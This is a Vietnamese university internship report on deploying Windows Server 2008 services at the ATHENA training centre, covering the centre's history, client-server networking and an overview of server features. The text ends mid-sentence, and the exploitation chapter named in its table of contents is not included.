1. TRƯỜNG ĐẠI HỌC CÔNG NGHIỆP TPHCM – KHOA CNTT
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ
AN NINH MẠNG QUỐC TẾ ATHENA
----------
BÁO CÁO THỰC TẬP TỐT NGHIỆP
NGHIÊN CỨU VÀ TRIỂN KHAI CÁC DỊCH VỤ TRÊN
WINDOWS SERVER 2008
GVHD: VÕ ĐỖ THẮNG
SVTT: NGUYỄNAN HUY
MSSV: 12119401
LỚP: NCTH6B
ĐCTT: 92 NGUYỄNĐÌNH CHIỂU,
P.ĐA KAO, QUẬN1, TPHCM
TPHCM, Tháng 05 năm 2015

2. LỜI CẢM ƠN
Trên thực tế không có sự thành công nào mà không gắn liền với những sự hỗ trợ,
giúp đỡ dù ít hay nhiều, dù trực tiếp hay gián tiếp của người khác. Trong suốt thời
gian từ khi bắt đầu học tập ở giảng đường đến nay, em đã nhận được rất nhiều sự
quan tâm, giúp đỡ của quý Thầy Cô, gia đình và bạn bè. Với lời biết ơn sâu sắc
nhất, em xin gửi đến quý thầy cô Khoa Công Nghệ Thông Tin – Trường đại học
Công nghiệp TPHCM đã cùng với tri thức và tâm huyết của mình để truyền đạt vốn
kiến thức quý báu cho chúng em trong suốt thời gian học tập tại trường. Và đặc biệt,
trong học kỳ này Khoa đã tổ chức cho chúng em thực tập và được tiếp cận với môn
học mà theo em là rất hữu ích đối với sinh viên ngành Công Nghệ Thông Tin.
Em xin chân thành cảm ơn Thầy Võ Đỗ Thắng đã hướng dẫn chúng em thực tập tại
Trung Tâm ATHENA cũng như những buổi nói chuyện, thảo luận. Nếu không có
những lời hướng dẫn thầy thì em nghĩ bài báo cáo này của em rất khó có thể hoàn
thiện được. Một lần nữa, em xin chân thành cảm ơn thầy.
Bài báo cáo được thực hiện trong khoảng thời gian gần 2 tháng. Bước đầu đi vào
thực tế, tìm hiểu, kiến thức của em còn hạn chế và còn nhiều bỡ ngỡ. Do vậy, không
tránh khỏi những thiếu sót là điều chắc chắn, em rất mong nhận được những ý kiến
đóng góp quý báu của quý Thầy Cô và các bạn học cùng lớp để kiến thức của em
trong lĩnh vực này được hoàn thiện hơn.
Sau cùng, em xin kính chúc quý thầy cô khoa CNTT Trường ĐH Công nghiệp
TPHCM và thầy Võ Đỗ Thắng thật dồi dào sức khỏe, niềm tin để tiếp tục thực hiện
sứ mệnh cao đẹp của mình là truyền đạt kiến thức cho thế hệ mai sau.
Trân trọng

3. NHẬN XÉT CỦA ĐƠN VỊ THỰC TẬP
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
.............................................................................................................................................
Tp.HCM, ngày …. Tháng ….. năm 2015
Xác nhận của ĐVTT

4. NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
.................................................................................................................................................
TP.HCM, Ngày ….. Tháng ….. Năm 2015
Xác nhận của GVHD

5. LỜI MỞ ĐẦU
Ngày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở nên phổ biến với
mọi người. Chúng mang lại cho con người khả năng to lớn và làm những công việc
phi thường: tính toán nhanh và chính xác các bài toán phức tạp, điều khiển tự động,
giải trí… Máy tính ra đời không chỉ hỗ trợ trong sản xuất mà còn trong việc học tập
và làm góp phần giải phóng sức lao động.
Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công nghệ thông tin
thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời. Sức mạnh máy tính có
thể nhân lên gấp nhiều lần khi được kết nối thành mạng máy tính. Là cơ sở hạ tầng
cho phép trao đổi thông tin, truyền tải dữ liệu từ xa nhằm rút ngắn khoảng cách. Với
mạng máy tính toàn cầu chúng ta dễ dàng tiếp cận với sự phát triển của thế giới
trong đó có sự phát triển gần nhất của Windows Server là Windows Server 2000 và
Windows Server 2003 và tiếp đến là Windows Server 2008 hỗ trợ tốt các dịch vụ
mạng cần thiết trên Server, việc cải tiến không ngừng giúp nâng cao tính ổn định và
an toàn hơn cho Windows Server 2008 hoạt động một cách trơn tru.
Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nước là một chủ trương hàng
đầu của nhà nước. Mạng máy tính trở thành mục tiêu nghiên cứu và phát triển. Cốt
lõi là ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ kiến trúc mạng đến
nguyên lý thiết kế, cài đặt mô hình ứng dụng v.v… Mạng viễn thông nói chung và
mạng máy tính trên nền tảng WS 2008 nói riêng là công cụ hữu dụng không thể
thiếu trong bộ máy nhà nước, trường học, doanh nghiệp… Nó đóng vai trò là cầu
nối trao đổi thông tin giữa các chính phủ, tổ chức xã hội và mọi người với nhau.
Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ trợ tận tình
của Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều kiến thức quý
báo. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp em có những trải
nghiệm vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu về mạng máy tính và
góp phần xây dựng một mạng máy tính thân thiện, thông minh cho mọi người sử
dụng.
Tuy đã có nhiều cố gắng song không thể tránh những khuyết điểm, sai sót vì thế
mong được sự thông cảm và những ý kiến đóng góp quý báo từ Quý Thầy Cô, bạn
bè, người thân để em có thể ngày một hoàn thiện bản thân mình hơn.
Xin chân thành cảm ơn.

6. MỤC LỤC
Chương 1 TỔNG QUAN VỀ TRUNG TÂM ATHENA................................................1
1. Giới thiệu về trung tâm....................................................................................................1
2. Quá trình hình thành và phát triển . ...............................................................................2
2.1. Quá trình hình thành. ................................................................................................2
2.2. Quá trình phát triển ...................................................................................................3
3. Cơ cấu tổ chức ..................................................................................................................4
4. Tình hình hoạt động trong năm ......................................................................................4
4.1. Cơ cấu sản phẩm........................................................................................................4
4.2. Các sản phẩm khác....................................................................................................5
5. Cơ sở hạ tầng ....................................................................................................................5
6. Các dịch vụ hỗ trợ:...........................................................................................................6
7. Khách hàng .......................................................................................................................6
8. Đối tác................................................................................................................................6
Chương 2 NÔI DUNG THỰC TẬP. ..................................................................................7
1. Nhiệm vụ được giao.........................................................................................................7
2. Kiến thức tìm hiểu............................................................................................................7
2.1. Giải pháp mạng doanh nghiệp .................................................................................7
2.2. Các thành phần công nghệ trong mạng doanh nghiệp..........................................7
3. Windows Server 2008......................................................................................................7
Chương 3 TỔNG QUAN VỀ WINDOWS SERVER 2008 ........................................ 10
1. GIỚI THIỆU WINDOWS SERVER 2008................................................................ 10
2. CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008 ........................................... 10
2.1. Công cụ quản trị Server Manager......................................................................... 10
2.2. Windows Server Core ............................................................................................ 11
2.3. PowerShell............................................................................................................... 11
2.4. Windows Deloyment Services.............................................................................. 12
2.5. Terminal Services................................................................................................... 12
2.6. Network Access Protection................................................................................... 12
2.7. Read-Only Domain Controllers............................................................................ 13
2.8. Công nghệ Failover Clustering............................................................................. 13
2.9. Windows Firewall with Advance Security.......................................................... 13

7. 3. MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 2008 .......................... 14
3.1. Công nghệ ảo hóa Hyper-V................................................................................... 14
3.2. Processor Compatibility Mode ............................................................................. 14
3.3. File Classification Infrastructure .......................................................................... 14
3.4. Quản lý trong ỗ đĩa và file:.................................................................................... 14
3.5. Cải tiến giao thức và mã hóa................................................................................. 15
3.6. Một số tính năng khác............................................................................................ 15
4. CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008 ................................................... 15
4.1. Web .......................................................................................................................... 15
4.2. Ảo hóa :.................................................................................................................... 16
4.3. Bảo mật:................................................................................................................... 16
4.4. Network Access Protection (NAP): ..................................................................... 16
4.5. Read-Only Domain Controller (RODC): ............................................................ 16
4.6. BitLocker:................................................................................................................ 16
4.7. Windows Firewall: ................................................................................................. 17
5. CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008............................................ 17
5.1. Windows Server 2008:........................................................................................... 17
5.2. Windows Server 2008 Standard Edition ............................................................. 17
5.3. Windows Server 2008 Enterprise Edition........................................................... 17
5.4. Windows Server 2008 Datacenter Edition .......................................................... 18
5.5. Windows Web Server 2008 .................................................................................. 18
Chương 4 CÀI ĐẶT WINDOWS SERVER 2008........................................................ 19
1. YÊU CẦU PHẦN CỨNG............................................................................................ 19
2. CÁC CÁCH CÀI ĐẶT................................................................................................. 19
3. NÂNG CẤP LÊN WINDOWS SERVER 2008........................................................ 19
4. CÀI ĐẶT WINDOWS SERVER 2008...................................................................... 20
Chương 5 DỰNG DOMAIN CONTROLLER ............................................................. 25
Chương 6 JOIN DOMAIN................................................................................................ 33
Chương 7 TRIỂN KHAI CÁC DỊCH VỤ MẠNG ...................................................... 35
1. DỊCH VỤ DNS.............................................................................................................. 35
1.1. Giới thiệu về DNS .................................................................................................. 35
1.2. Cài đặt DNS ............................................................................................................ 35
1.3. Cấu hình DNS ......................................................................................................... 36

8. 2. GIỚI THIỆU DỊCH VỤ DHCP .................................................................................. 41
2.1. Hoạt động của giao thức........................................................................................ 41
2.2. Cài đặt DHCP trên windows server 2008 ........................................................... 41
2.3. Cấu hình DHCP ...................................................................................................... 45
Chương 8 TRIỂN KHAI VPN.......................................................................................... 48
1. Tìm hiểu VPN................................................................................................................ 48
1.1. Khái niệm. ............................................................................................................... 48
1.2. Các loại VPN. ......................................................................................................... 49
1.3. Bảo mật trong VPN................................................................................................ 50
1.4. Sản phẩm công nghệ dành cho VPN.................................................................... 51
1.5. Bộ xử lý trung tâm VPN........................................................................................ 51
1.6. Router dùng cho VPN............................................................................................ 51
1.7. Tường lửa PIX của Cisco ...................................................................................... 51
2. VPN SITE TO SITE ..................................................................................................... 52
2.1. Chuẩn bị:.................................................................................................................. 52
2.2. Đặt IP cho 4 máy .................................................................................................... 52
2.3. Tiến hành cấu hình trên 2 server. ......................................................................... 53
2.4. Kiểm tra. .................................................................................................................. 62
Chương 9 MAIL TRÊN VPS............................................................................................ 63
1. Cài đặt MDmoon v10. .................................................................................................. 63
2. Cấu hình MDmoon v10................................................................................................ 63
Chương 10 CHƯƠNG 10: BẢO MẬT WINDOWS.................................................... 75
1. Khai thác lỗ hổng trên Windows XP với mã lỗi MS08_067................................... 75
2. Khai thác lỗ hổng trên Windows XP với mã lỗi MS12_004................................... 77
Chương 11 KẾT LUẬN ..................................................................................................... 83
1. Các kết quả đạt được: ................................................................................................... 83
2. Kinh nghiệm thực tế...................................................................................................... 83
3. Hoàn thiện bản thân ...................................................................................................... 83
4. Các kiến thức được lĩnh hội......................................................................................... 83
5. Kết luận. ......................................................................................................................... 84

9. 1
Chương 1
TỔNG QUAN VỀ TRUNG TÂM ATHENA
1. Giới thiệu về trung tâm
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền
thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương
hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập
theo giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí
Minh cấp ngày 04 tháng 11 năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING
NETWORK SECURITY COMPANY LIMITED
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt
huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần
vào công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đã và đang
tập trung chủ yếu vào các họat động sau:
 Công tác huấn luyện, quảng bá kiến thức tin học, đặc biệt trong lĩnh vực mạng
máy tính, internet, bảo mật và thương mại điện tử….
 Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản
xuất kinh doanh.
 Cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên
gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức,
doanh nghiệp có nhu cầu.
 Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ
sở dữ liệu thông tin về các ứng dụng và sự cố mạng.
 Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy
ra sự cố máy tính.
Trụ sở và các chi nhánh của trung tâm Athena
 Trụ sở chính:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế THENA
Địa chỉ: 92 Nguyễn Đình Chiểu , P.Đa Kao, Quận 1, Tp Hồ Chí Minh.
Website: www.Athena.Edu.Vn
Điện thoại: ( 84-8 ) 2210 3801 - Hotline: 0943 20 00 88

10. 2
 Cơ sở 2_Tại TP Hồ Chí Minh:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế THENA
Địa chỉ: Số 2 Bis Đinh Tiên Hoàng, P.Đa Kao, Quận 1, Tp Hồ Chí Minh.
Website: www.athena.com.vn
Điện thoại: ( 84-8 ) 3824 4041 - Hotline: 0943 23 00 99
 Chi nhánh Nha Trang
Điện thoại : 08. 3824 4041 - Fax: 08. 39 111 692
Website: www.athena.edu.vn
Email : training@athenavn.com
2. Quá trình hình thành và phát triển .
2.1. Quá trình hình thành.
Năm 2000, một nhóm các thành viên là những doanh nhân tài năng và thành công
trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo
nền công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn
cao và có đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của ngành công nghệ
thông tin trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ
thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá
nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công
nghệ thông tin cho đất nước và xã hội.
Các thành viên sáng lập trung tâm gồm:
Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại
là giám đốc dự án của công ty Siemen Telecom.
Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó
Tổng công ty FPT.
Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách nhiệm
công nghệ thông tin của Ngân hàng.
Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh
mạng Athena.
Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính gần
100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền
Nam.

11. 3
Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, hay còn gọi là Trung
tâm đào tạo Quản trị và An ninh mạng Quốc Tế Athena (tên thương hiệu viết tắt
là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy
phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp
ngày 04 tháng 11 năm 2008.
2.2. Quá trình phát triển
Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung
tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt
hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên của các doanh nghiệp về
các chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử, bảo
mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng kí học. Đòi
hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội ngũ giảng
viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của
đất nước nói chung, các doanh nghiệp, cá nhân nói riêng.
Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm một
chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng
viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và học viện
công nghệ thông tin uy tín trên toàn quốc, đồng thời trong thời gian này Athena có
nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực công nghệ thông tin lành
nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên của trung tâm.
Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên,
cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào
nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi
công ty gây nên sự hoang man cho toàn bộ hệ thống trung tâm. Cộng thêm chi
nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa làm
cho trung tâm rơi từ khó khăn này đến khó khăn khác.
Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần
vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai
nhà đầu tư lên làm giám đốc và xây dựng lại trung tâm. Đây là một bước chuyển
mình có ý nghĩa chiến lược của trung tâm. Mở ra một làn gió mới và một giai đoạn
mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép đã giúp ông Thắng vượt
qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng.

12. 4
Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm
đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động
của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào tạo quản
trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty, tổ chức
doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân lực công
nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến trình
tin học hóa nước nhà.
3. Cơ cấu tổ chức
Hình 1: Sơ đồ tổ chức công ty
4. Tình hình hoạt động trong năm
4.1. Cơ cấu sản phẩm.
4.1.1. Các khóa học dài hạn
– Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
– Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician.
– Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager
Administrator.
4.1.2. Các khóa học ngắn hạn

13. 5
Khóa Quản trị mạng
– Quản trị mạng Microsoft căn bản ACBN
– Phần cứng máy tính, laptop, server
– Quản trị hệ thống mạng Microsoft MCSA Security.
– Quản trị mạng Microsoft nâng cao MCSE
– Quản trị window Vista
– Quản trị hệ thống Window Server 2003:2008
– Lớp Master Exchange Mail Server
– Quản trị mạng quốc tế Cissco CCNA
– Quản trị hệ thống mạng Linux 1 và Linux 2.
Khóa thiết kế web và bảo mật mạng .
– Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart
– Lập trình web với Php và MySQL
– Bảo mật mạng quốc tế ACNS
– Hacker mũ trắng
– Athena Mastering Firewall Security
– Bảo mật website.
4.2. Các sản phẩm khác.
– Chuyên đề thực hành sao lưu và phục hồi dữ liệu
– Chuyên đề thực hành bảo mật mạng Wi_Fi
– Chuyên đề Ghost qua mạng
– Chuyên đề xây dựng và quản trị diễn đàn
– Chuyên đề bảo mật dữ liệu phòng chống nội gián
– Chuyên đề quản lý tài sản công nghệ thông tin
– Chuyên đề kỹ năng thương mại điện tử.
5. Cơ sở hạ tầng
– Thiết bị đầy đủ và hiện đại.
– Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
công nghệ mới nhất.
– Phòng máy rộng rãi, thoáng mát.

14. 6
6. Các dịch vụ hỗ trợ:
– Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn
– Giới thiệu việc làm cho mọi học viên
– Thực tập có lương cho học viên khá giỏi
– Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không
giới hạn thời gian
– Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy
tính, mạng máy tính, bảo mật mạng
– Hỗ trợ thi Chứng chỉ Quốc tế.
7. Khách hàng
– Mọi đối tượng chuyên hoặc không chuyên về CNTT.
– Khách hàng chủ yếu của ATHENAlà các bạn học sinh, sinh viên và các cán bộ
công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.
8. Đối tác
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp
nhân sự CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng
cho các đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài
chính.

15. 7
Chương 2
NÔI DUNG THỰC TẬP.
1. Nhiệm vụ được giao.
 Nghiên cứu các dịch vụ mạng trên Windows Server 2008
 Triển khai các dịch vụ mạng trên Windows Server 2008
2. Kiến thức tìm hiểu
2.1. Giải pháp mạng doanh nghiệp
2.1.1. Giới thiệu về mạng doanh nghiệp
Hệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo quy mô và
loại hình của doanh nghiệp. Ngày nay, các nhà cung ứng đã đưa ra rất nhiều sự
chọn lựa cho doanh nghiệp như cho phép doanh nghiệp tự trang bị, tự quản lý hoặc
sử dụng dịch vụ. Những doanh nghiệp lớn với hàng ngàn máy tính cũng có những
giải pháp quản lý đặc thù kết hợp cả phần cứng và phần mềm.
Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các ứng dụng công nghệ thông
tin (CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có những nhu cầu khác
nhau về quản trị hệ thống mạng (network) của doanh nghiệp. Một hệ thống được
kiểm soát tốt sẽ làm giảm đáng kể chi phí hoạt động, nâng cao hiệu quả cũng như
độ tin cậy của hệ thống.
2.2. Các thành phần công nghệ trong mạng doanh nghiệp
Tùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải pháp công
nghệ và thiết kế sao cho phù hợp nhất.
Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều tài nguyên của hệ thống
và băng thông mạng, cũng như các yêu cầu về điều khiển, giám sát mạng. Vậy làm
thế nào để một doanh nghiệp vừa và nhỏ, với một số vốn đầu tư ban đầu hạn chế,
có thể tiếp cận được với các công nghệ hiện đại, bắt kịp sự phát triển của thế giới.
3. Windows Server 2008
Giới thiệu về mô hình Client-Server
Điều đáng ngạc nhiên là nhiều công ty ngày nay vẫn không quan tâm đến việc
thực hiện một mạng lưới client/server. Thay vào đó họ chỉ tiếp tục thêm vào các
máy trạm để thực hiện mô hình mạng peer-to-peer. Mạng peer-to-peer không
cung cấp cho bạn nhiều cách bảo mật và chia sẽ tài nguyên. Vì vậy, không có gì

16. 8
ngạc nhiên khi họ thường có vấn đề với việc truy cập vào máy trạm, bị mất dữ
liệu do virus, spyware hay phải trải nghiệm việc internet bị gián đoạn. Máy tính
nối mạng theo mô hình peer-to-peer là đủ khi bạn chỉ có một vài người dung trên
mạng, nhưng khi có nhiều hơn 5 hoặc 6 người sử dụng trên mạng của bạn, bạn
thực sự phải xem xét đầu tư một máy chủ mạng.Vậy lợi ích của mô hình Client-
Server cụ thể là gì?
- Tập tin và an ninh mạng: Vai trò quan trọng nhất của một máy chủ tập tin
là an ninh mạng mà nó cung cấp. Bằng cách tạo ra các tài khoản người dùng cá
nhân và nhóm, có thể cấp quyền cho nhóm và cá nhân khai thác dữ liệu được lưu
trữ trên mạng, ngăn chặn người sử dụng trái phép truy cập tài liệu mà họ không
nên xem. Ví dụ, trong Folder chung thì group ketoan và group nhansu có quyền
truy cập ủa nhân viên…
- Tăng độ tin cậy, giảm sự gián đoạn công việc: Nhiều máy chủ được trang
bị nguồn điện dự phòng. Với một nguồn cung cấp năng lượng thứ cấp chạy song
song, sự mất mát của một trong những nguồn cung cấp điện không ảnh hưởng
đến hoạt động hệ thống bình thường. Cũng vậy với hệ thống lưu trữ của máy chủ.
Không giống như một máy tính để bàn trung bình có sử dụng một ổ cứng duy
nhất, một máy chủ sẽ thường sử dụng nhiều ổ đĩa cứng làm việc trong một RAID
cấu hình để ngăn ngừa mất dữ liệu hoặc một sự gián đoạn trong quy trình làm
việc. Ngoài ra, nhiều máy chủ cũng được trang bị ổ đĩa cứng hot swappable và
nguồn cung cấp điện. Các thành phần này có thể thay thế nóng cho phép bạn thay
thế phần cứng bị lỗi mà không gián đoạn toàn bộ văn phòng. Ngoài ra, kể từ khi
tất cả các dữ liệu nhân viên đang được lưu trữ trên mạng, nếu máy trạm của
người dùng không giữa ngày làm việc, nhân viên có thể truy cập các tập tin tương
tự từ máy trạm khác.
- Tập trung lưu trữ dữ liệu và tài nguyên chia sẻ: Với một máy chủ mạng,
tất cả người dùng trên mạng có thể sử dụng các tài nguyên mạng khác nhau ngay
từ bàn làm việc, tăng hiệu quả. Một số trong những nguồn tài nguyên bao gồm:
 Tập trung lưu trữ dữ liệu ( RAID Array )
 Network Attached Storage (NAS) thiết bị
 Tháp đĩa CD / DVD
 Máy in và máy chủ Fax

17. 9
- Quản lý virus : Một trong những mối đe dọa lớn nhất đối với mạng của bạn
là khả năng lây nhiễm từ virus, phần mềm gián điệp và thư rác. Vì vậy, có tốt,
cập nhật, phần mềm chống virus được cài đặt trên hệ thống của bạn là một điều
cần thiết.
Trong một văn phòng của 10 người hoặc ít hơn, hệ thống có thể được duy trì riêng.
Bất cứ điều gì nhiều hơn thế, tuy nhiên, có thể trở thành một gánh nặng thực sự.
Trong những trường hợp này, một gói phần mềm chống virus kết hợp máy trạm và
bảo vệ chống virus máy chủ vào một giải pháp duy nhất có ý nghĩa hơn.
- Sao lưu tập trung: Tất cả các doanh nghiệp nên sao lưu dữ liệu của họ một
cách thường xuyên. Bởi có tất cả các công ty của bạn và dữ liệu nhân viên được
lưu trữ tại một địa điểm, bản sao lưu có thể được thực hiện đáng tin cậy và nhanh
chóng. Vì vậy, bạn sẽ không bao giờ cần phải lo lắng về những dữ liệu được lưu
trữ trên những gì máy trạm như bạn làm trong một mạng peer-to-peer. Ngày nay,
hầu hết các loại phương tiện truyền thông có thể được sử dụng cho mục đích sao
lưu. Ngoài các ổ đĩa truyền thống băng, đĩa CD, DVD, lưu trữ và thậm chí loại bỏ
Network Attached Storage (NAS) thiết bị này là chấp nhận được. Sự lựa chọn
của bạn của phương tiện truyền thông sẽ phụ thuộc vào yêu cầu cụ thể của bạn
sao lưu. Tùy thuộc vào ngân sách của bạn và nhu cầu lưu giữ dữ liệu của bạn, bất
kỳ trong số này sẽ là một giải pháp chấp nhận được. Hãy chắc chắn rằng bạn có ít
nhất một bản sao lưu hàng tuần theo lịch trình, mặc dù hàng ngày sẽ tốt hơn.

18. 10
Chương 3
TỔNG QUAN VỀ WINDOWS SERVER 2008
1. GIỚI THIỆU WINDOWS SERVER 2008
Microsoft Windows Server 2008 là thế hệ kế tiếp của hệ điều hành Windows
Server, có thể giúp các chuyên gia công nghệ thông tin có thể kiểm soát tối đa cơ sở
hạ tầng của họ và cung cấp khả năng quản lý và hiệu lực chưa từng có, là sản phẩm
hơn hẳn trong việc đảm bảo độ an toàn, khả năng tin cậy và môi trường máy chủ
vững chắc hơn các phiên bản trước đây.
Windows Server 2008 cung cấp những giá trị mới cho các tổ chức bằng việc bảo
đảm tất cả người dùng đều có thể có được những thành phần bổ sung từ các dịch vụ
từ mạng. Windows Server 2008 cũng cung cấp nhiều tính năng vượt trội bên trong
hệ điều hành và khả năng chuẩn đoán, cho phép các quản trị viên tăng được thời
gian hỗ trợ cho các doanh nghiệp.
Windows Server 2008 được thiết kế để cung cấp cho các tổ chức có được nền tảng
sản xuất tốt nhất cho ứng dụng, mạng và các dịch vụ web từ nhóm làm việc đến
những trung tâm dữ liệu với tính năng động, tính năng mới có giá trị và những cải
thiện mạnh mẽ cho hệ điều hành cơ bản.
Cải thiện hệ điều hành cho máy chủ Windows.Thêm vào tính năng mới, Windows
Server 2008 cung cấp nhiều cải thiệm tốt hơn cho hệ điều hành cơ bản so với hệ
điều hành Windows Server 2003.
Những cải thiện có thể thấy được gồm có các vấn đề về mạng, các tính năng bảo
mật nâng cao, truy cập ứng dụng từ xa, quản lý role máy chủ tập trung, các công cụ
kiểm tra độ tin cậy và hiệu suất, nhóm chuyển đổi dự phòng, sự triển khai và hệ
thống file.
2. CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008
2.1. Công cụ quản trị Server Manager
Server Manager là một giao diện điều khiển được thiết kế để tổ chức và quản lý một
server chạy hệ điều hành Windows Server 2008. Người quản trị có thể sử dụng
Server Manager với những nhiều mục đích khác nhau.
- Quản lý đồng nhất trên một server
- Hiển thị trạng thái hiện tại của server

19. 11
- Nhận ra các vấn đề gặp phải đối với các role đã đƣợc cài đặt một cách dễ dàng
hơn
- Quản lý các role trên server, bao gồm việc thêm và xóa role
- Thêm và xóa bỏ các tính năng
- Chẩn đoán các dấu hiệu bất thường
- Cấu hình server: có 4 công cụ (Task Scheduler, Windows Firewall, Services
và WMI Control).
- Cấu hình sao lưu và lưu trữ: các công cụ giúp bạn sao lưu và quản lý ổ đĩa là
